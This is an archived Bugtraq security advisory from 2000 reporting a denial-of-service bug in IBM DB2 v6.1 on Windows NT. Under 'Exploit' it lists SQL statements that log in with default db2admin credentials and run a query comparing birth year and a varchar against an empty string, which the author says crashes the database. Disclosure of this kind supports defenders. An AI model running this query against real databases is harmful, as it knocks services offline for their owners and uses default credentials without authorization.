[17938] in bugtraq
IBM DB2 SQL DOS
daemon@ATHENA.MIT.EDU (benjurry)
Wed Dec 6 16:54:11 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="gb2312"
Message-Id: <007e01c05ebf$cf18fe20$3300a8c0@dudu>
Date: Tue, 5 Dec 2000 21:32:25 +0800
Reply-To: benjurry <benjurry@YEAH.NET>
From: benjurry <benjurry@YEAH.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
1.Description
The DB2 Universal Database builds upon the stability and performance of DB2 on the mainframe and provides the features required in a distributed database product. DB2 Universal Database (UDB) is IBM's relational database server solution for the UNIX, OS/2 and Windows NT/2000 operating environments.And More than 70% of the world's major companies rely on DB2 to manage their mission-critical business applications.
2.Problem:
There is a bug when you excute a special sql include time and varchar ,which will make the database crash.
3.Platforms:IBM DB2 for winnt(v6.1)
4.Exploit
connect reset;
connect to sample user db2admin using db2admin;
select * from employee where year(birthdate)=1999 and firstnme<'';
these sql will make the database crash.
5.About us
RAF Info-Tech Corporation Ltd. is an Internet security consulting and service provider. The headquarter of RAF is located in Shenzhen, which is an exciting city in southen of China. For keeping the company at the leading age of the technology, RAF established an Internet security research center in Tsinghua University in Beijing.
Based on the "RAF Security Theory", the company currently can provide the customized Inernert security solution to the various clients. RAF also provides the technical services and support to the Internet security product manufacturers.
If you are interesting in the RAF's services or having any question to the
company, please e_mail to CHINARAF@PUBLIC.SZPTT.NET.CN. or benjurry@263.net
6.Thank for my firends xq and kingworld.
